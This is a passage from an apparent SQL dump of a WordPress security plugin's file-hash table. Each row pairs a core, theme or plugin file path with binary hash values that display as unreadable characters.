�v','',0,'?'),('����MM1���{=��','wp-content/themes/travelify/library/js/functions.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�>�Ki��d����EW','-5\n���:m��5;���]�IE-��w�E���','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��V��^�������','wp-content/themes/clean-magazine/sidebar-header-right.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�	��%�mBo��߹\r','�o�z���0��*�����&�\'xW%���*�	a','',0,'?'),('��鯮�Q6d%m���F','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon-box/views/view.php',0,'�\0E�f���27�6{r','�\0E�f���27�6{r','U��/>|��=/�(e�%�`[���»���N','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('��E\Z���G\Z�Ax','wp-content/themes/skt-construction-lite/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�~�|�I\'���Š�','�A}�#�?*Xt�I�;\n�;�[+)�v���]�','',0,'?'),('�\0݉���sJ#B�ۖ','wp-content/plugins/spam-captcha/core/lang/SL_framework-es_ES.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ע�\nx�����y�KK�','��oM�c��\Ztw^�l���j\r���dB��zM�','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��TO����sk%�','t�GT��B	��q�u2�v���)SX�d����r','',0,'?'),('�v����ʩ9��','wp-content/themes/illdy/layout/js/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�j���H�\"�qA','}��7�a�\0�v;[7=40�GJ��j�;Q��r','',0,'?'),('����9��A�7��O�','wp-content/themes/fluida/admin/images/magazine-2col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�e�x���eT�o�w','���`1�rNS\0���h�7�����9+V','',0,'?'),('�/�� i2�G�I�','wp-content/themes/tortuga/js/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^I+�$�Cbw�\Z','�{�`R�;о)�!p��c��F`}?��-`8��)�','',0,'?'),('�2%��{I�\Z����','wp-content/themes/hueman/parts/single-author-date.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9.�g���]�DQ� &','�tU\0g E㐻{�X���Ɔ��)���','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�w�s6���/	�a\\`','O!���)v�DŽ��S�A}�	��\'}$�{2','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M`���.�P4߹�w','�_��[�K-�}wl#��؛�q����![2�R','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�p���-Ÿ[	{U�C�','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.afternic.php',0,'my��HI\\3e{��','my��HI\\3e{��','��E�$Y�=��[^**Pc��}컴�r����','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�z�R������	�','��b���+�ZƓ��з�e;���\nT憅3','',0,'?'),('�{}��\0]�`����','wp-content/themes/nirvana/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EC���9����S��','�qVL��vM5��2�A�t��}�{�PR�3q','',0,'?'),('߆<߯?+��sQ[��','wp-content/themes/hueman/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%J�~wm�\"�j瑶','�����U��9>+	Ћ���NW<K�','',0,'?'),('ߋ��f���9�U��\0','wp-content/plugins/contact-form-7-modules/languages/en_US.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZǜUk�$8��f��','�M{^��Q�v��2 ^����\"ӕ��`�.M','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('ߧ�i$�?V�G�_bfqo','wp-content/themes/nirvana/fonts/opensans-semibold-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t2�I���}��̺�','�Vq5����b��fm�E\r@��-�()�<��H�','',0,'?'),('߮�=?�p�׺�����v','wp-content/themes/sg-window/single-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӗ93Cy��+�O','�$��1��K��4� v�ls�:��9�%L?��','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('ߴ�AZ��j,@GR��','wp-content/plugins/dw-social-share/assets/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('ߴ�2�� �<�r%`�y','wp-content/themes/skt-construction-lite/inc/about-themes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��mHd���c�sM��','%w�*Ǘ��H��G�y-�/��?�έ��','',0,'?'),('ߵ�H�\'�K�wwʿ�%-','wp-content/themes/hueman/assets/front/img/demo/8-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U�}}$\"�G','4��J#�\n�B�N�0����@Z�0�j�','',0,'?'),('߹V�=���\"�#n�	�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('��XG�#1�h�2-s5b�','wp-content/themes/vega/includes/wp_bootstrap_navwalker.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�\Z�)���Y�','��b\np���@)��7NV�_��\n�M�)�ab�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʼn��༼�D�t�Xj��','��\n��B� ��ul�Fı,�\ZL��(�/H','',0,'?'),('�˛�g�E��	���:','wp-content/themes/barletta/inc/widgets/widget-barletta-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tt��nz/\'G�X�LN�G','/��I�GJt@z�j��l�m��k )j��+��','',0,'?'),('��G]��9���e7��(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���7[�x�蛴','8�I��ԉo�)\'z�R�^�-M1\'�\0����','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��S��������Ό��','wp-content/themes/alpha-store/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�6{���{�3����','�B��ܣ��l��fr\nip/�ۊ5+�b�W�','',0,'?'),('��#{�x��\'!�B��','wp-content/themes/precious-lite/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���,���J��T�','t��R���Yp��=Q�o;b[7P�\nk�,L���I','',0,'?'),('��$dp���C����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'�ZP��ie����','6m�<g��\0{tX��)��U�4�N�4M�3','',0,'?'),('��e�B��u5����','wp-content/themes/panoramic/library/includes/extras.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�@�wc#��,��','�&ʠz�����te%�PV#�2~�W�E�|�|','',0,'?'),('��eş+�\r��	���','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���+(7�D��',')�vIy��a��\"?����@v�pYAqJ���>�','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h����r�mnq��E',' F����M�,s���CvU�7��ԍ�$�jț�','',0,'?'),('�\'�Q,[^�}���+�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/hu.js',0,'���V\'�?Y#Pa\n','���V\'�?Y#Pa\n','̗w�J)�h�,[^O��ge�,�GD{��','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�<�%h�@��8Ωd�','wp-content/themes/fluida/cryout/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��<�!�A�1{��','\n�uF�3��i��f{(\0R��|��tW��9c�<','',0,'?'),('�?7�`��9���Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��If�D�S~�Ee;\"','-�L\\Z�%���Er_^nniW�B-�mC���5A','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�\\�Lǎk����B�Ζ','wp-content/themes/tortuga/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�1d8�B�\0�\0���~','�!5��X�YF���q�_s�y\Z��q|n&�|','',0,'?'),('�b*`]~�F�~i�\r','wp-content/themes/tortuga/images/default-slider-image.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cj���E�r�d�yTi:','�ĩ�ǘ�;��� �6�=����ߐ���','',0,'?'),('�t�XQڲ*��1S���','wp-content/themes/hueman/languages/ja.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<1�V�dyeK�Z�','�쥗�J�7\\�֣oc�m�gg�ʂu]�','',0,'?'),('��&�V*o�����)�','wp-content/themes/sg-window/sidebar-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�5�\n�w�7�f�','H�wBbE���w9\\�H�J\"�!�V�� ķ�=','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���T\\���;� ','�x8W���dʚp���WJ�1mX����','',0,'?'),('�C��E�\r{}`�C/','wp-content/themes/fluida/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W+�:�_�%���','GZ�zpwA�\'\0MI��i>L�3t��j7pz4�X;','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('�N�M�\n�`��q�z','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/learning.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i���A��)��Ɍ<W�','����\Z��◳7�J?VD��ga܊�-i��','',0,'?'),('�Q㾬�|��=���Td','wp-content/themes/supernews/assets/library/bxslider/images/bx_loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��kP�k lf�`�F','xe���z�:��\Z��{�@xnj�~Q&#f�','',0,'?'),('అ��GX9�1E�ֳ','wp-content/themes/hueman/assets/front/img/sidebar/s-right-s1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�\"c�7d�[9���','�!t��u�;[/)�y\\U�Y����O(f}��.','',0,'?'),('෪��HS�v<��g0ZJ','wp-content/themes/tortuga/js/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���{I6\"2A�d���','�vi�өٱ�X�nd��kR{#���Wz�x�T�','',0,'?'),('���ba;������J=�','wp-content/themes/sg-window/archive-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ҷ�\0�d)��','�E�x�V��62��r�1���\\��g��!','',0,'?'),('��\n�x����\r�$�','wp-content/themes/mh-magazine-lite/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�̨�!�[�ᅲ|[','��l�v[�%AhZ��R�I�l(,A�k��17�CZh','',0,'?'),('���AP̤���6�==Z','wp-content/themes/barletta/fonts/glyphicons-halflings-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ዿa*.C��q�/N','�Iٖ��KJ\"�t�ϭ^�b_[#f�K�:O)g','',0,'?'),('��\Z�$]�W��wP�l','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('���s,���h���','wp-content/themes/alpha-store/template-parts/template-part-home-cats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�z�:��|x��ő�-','��:�����f����=G�@qKAu�','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�H���VFOe','�tHa�1o���>����l��>��gd5��q�','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('���O�w�V9�W�','wp-content/themes/nirvana/admin/images/schemes/Bleached Landscape.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tJ�@ׇ������s� ','��s��C�H�gg��l,{Y�6�T_&jM�L','',0,'?'),('�:���䚄�L|�','wp-content/plugins/wp-date-remover/public/class-wp-date-remover-public.php',0,'�^�x����?ĩ','�^�x����?ĩ','��]\n�8���Ks��\n����o!�B��8��','',0,'?'),('�?��N��U��y�\'3','wp-content/themes/illdy/layout/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�z�6C�\"Q6gT�*','-u���f�_F�\nPc�1=m���rW������5','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�r͞[#�����7H','���n�h�һ�� �Qhg82g��,�y��>TW','',0,'?'),('�R&kI�p`�H$�����','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.ch.php',0,'���!/՚R=�urzž','���!/՚R=�urzž','�	�������<}}7���^2+/���i�3�}','',0,'?'),('�W-3��də��;\Z�\r','wp-content/themes/mh-magazine-lite/languages/pt_PT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-:9���k','SKU��r{HJ�fn3���D�����˯��','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('�c\n�W�n���q��%�','wp-content/themes/verbosa/includes/core.php',0,'�ZƋ��J��س��\'�','�ZƋ��J��س��\'�','��O��2S�|g�%\r�!ď��JA,��_��Tn{','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�eQ�;�\'��1','� ¬\'py�p@�\"���%i��q7�Vx��\n','',0,'?'),('ኁ�Yb@��x��N','wp-content/themes/fluida/admin/images/logo-about-top.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eq�Ř�֗\r�3��','�x�(�L�J�����腑a�0)O��03���!�','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�>“���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�1�oE>�u�ǘ�\n','a\n\r�$۱�y��q�*��$q��{��','',0,'?'),('ᚅ���\\�_�6Y�','wp-content/themes/nirvana/fonts/elusive.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����D�<�2��	�','���2\r�KJDd�]0祾���dp�\"s��9�','',0,'?'),('�\0���-�sY�@�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-gdrive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�BὨ��UR�G���','�/՜�A�O��`N��#O��}�S���^Vv_','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o�����\\�','��Zm�$z��p�uC��VgIgI���N�','',0,'?'),('�os-�z{�󎉟?�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/icon/views/view.php',0,'#&Y�v�e�_�nݠ','#&Y�v�e�_�nݠ','>,	ֿd��P��<��k��S2I͹�99b�	y','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�����fj���1NS','������&�ȃ*Bβ\0!��\r�`��\Z�)','',0,'?'),('��:�L`��=	����','wp-content/themes/vega/sample/images/full-2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nʼ�W��D�]�q�','܂�<3U�Ānz��O�(�*`G�����a�','',0,'?'),('��\"�C*�����.��','wp-content/plugins/wordfence/vendor/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('��_��T�eV&��i','wp-content/plugins/dw-megamenu/assets/fonts/fontawesome-webfont.svg',0,'�t☼�z%ҽXhU.','�t☼�z%ҽXhU.','����\'�����#I �\0�(0����\\k�4�','',0,'?'),('��x���ך\\\\sZ�','wp-content/themes/accelerate/js/accelerate-custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ū��߲�i�+Q��','9BXXrj#d��+:n�\n�/�KI�?�Y�˝���','',0,'?'),('��GO�V[��߳ʄ_','wp-content/themes/mh-magazine-lite/content-author-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��i���\"�1D�.�','r����k��8�f�&���wJ�5���y:��l��+','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('�S�����}���S�','wp-content/themes/fabulous-fluid/images/grid-img4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��w\\s��@�����','AiںGC\'��F��\nS!���$�)��_�2\"*','',0,'?'),('�8�\n�����o��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}��\nfu�J','�rԢ�`��ʼ���������5q�N	`���','',0,'?'),('�u�:� \\(���','wp-content/themes/fabulous-fluid/css/customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r,5�y�8�1��Ǭ,','����-,\r@T8P󃧊em(&�Z{/���\"4|','',0,'?'),('�w�լq�cR{���','wp-content/themes/aqueduct/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���Z����?�L8;n�','�*�VWJ��!;}�=>����D�F�ǘ�7','',0,'?'),('�\0��?�T>>��\nއ','wp-content/themes/travelify/content-leftsidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^h���G��RJR�l',':L��8��{� ?sJֻ�\'tD�32��t��<f','',0,'?'),('�]2�b�hV~���S','wp-content/themes/hueman/assets/front/img/header/yosemite-280.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�(2��ó�� ��/�','�y��i;�O��s�Ds#������V�A�!�','',0,'?'),('��h�=4��&�満�','wp-content/themes/panoramic/languages/panoramic.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\"z����+��p�K�','������H�(���eW~.��88�S�:��','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('�x8��f�Ưc��Gt','wp-content/themes/morfeu/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B��z�{2�ٰ�1','K����•k\nܴ�:j%Ʀbu�R�j3��','',0,'?'),('�\'�/�O�\n^�� U\" �','wp-content/plugins/all-in-one-wp-migration/lib/view/assets/font/servmask.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\\�_]�/SОɸ','h�4�����k�}^ >��3V�F�������','',0,'?'),('�*\rE�2<�����\"','wp-content/themes/hueman/assets/front/img/demo/4-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�社�E2Hs�}�+�qn','��v�vGz+����* 7\'!B�k[�_T*�˥�','',0,'?'),('�L�y��?+ET�C�','wp-content/plugins/spam-captcha/core/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�y70M��Q��@�K	Z','\Z��ĸ�Y�BɩZ�m����<��،3d��z','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���U2?��ɻ[i�','�J�\\C�A�>K#�ۏ�\\{����2��s','',0,'?'),('�N�7Vұ}z��!v�%','wp-content/themes/hueman/languages/cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','⭅�u�CtN/�2i�K','Ok�L�K�j�Ʊ��o���$�������a�E�Q','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R	�V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('�kX��K�T�7�','wp-content/plugins/wordpress-seo/admin/views/form/fieldset.php',0,'�\\��<�����)�Z','�\\��<�����)�Z','Wey��)Se`�Qç�ZӢ�~e�>�\r�?','',0,'?'),('�l�Ƀa�nd�v\"��Q','wp-content/plugins/contact-form-7/admin/js/tag-generator.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ު��(.���Ԁ','�n��z��F��:�i������j_�&I[�t�','',0,'?'),('�ph,�\'����	Q��*�','wp-content/plugins/spam-captcha/core/templates/js/js_front.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('�v�$Z�^\n�.��e','wp-content/themes/fluida/admin/images/image-style-3.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L%��\'%<����0','~p*7�Țf��3QY�\'\Z/qۤӥk걥','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�w@�M��3��','�r��F�,��T	�®�ab}���Wp\0g[��J','',0,'?'),('�{H����jJsW��E','wp-content/themes/fluida/includes/custom-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>YH69���g�G�#9','ݣ�[�� M>���h�wٙ+Ҟ���t=�����','',0,'?'),('�{K~�ղ���Ų��ۨ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k&���}�;1','�.v;�q��]�m�,�\\ؔ���Zr�.�\n{','',0,'?'),('‛/�t\0��~$��9','wp-content/plugins/unyson/framework/includes/option-types/upload/views/any-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%~��\Z���zZs�lH�','��)��~_b�b��;��y:=!��w!�ܖ-�N ','',0,'?'),('�қ�H(���)��b�@','wp-content/themes/supernews/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�MF�-\'c��)�','��CCo�Զ�I��fv��[O��o����L�X)\\','',0,'?'),('�S8t71q���U�','wp-content/themes/skt-construction-lite/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��a8���_C\\\0�I�','�\'�\\�o4���o�|4I,@ J�O����Ћ�','',0,'?'),('�~��v���e��C[','wp-content/themes/the-minimal/images/archive-img.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���vz���v�����','���ƎD/�m���8V8��Ы�� OY��','',0,'?'),('�V�\Z�e���T','wp-content/plugins/spam-captcha/lang/spam_captcha-pl_PL.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����1�W�͜��','��94����*�����B�;��xtp���*\'�','',0,'?'),('��:�6d�e\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӟ=:&��$.���W`vI','�u����y�Һ\0v�&�%�0)^�\ZA�6�','',0,'?'),('�t�Dc�<�2�C��7','wp-content/themes/point/images/mediumthumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�^��)`hv����','C\rB4��x�\r��v�$	|hhY�Nz�/)','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l���	�|qI','E\\�kb�i-ꍁ2�lS�͡�����\n����','',0,'?'),('�ӗ��6��0����$��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/table/includes/fw-option-type-table/views/view.php',0,'�b?~X�&v����̈��','�b?~X�&v����̈��','��HIAV��h����%;��I1	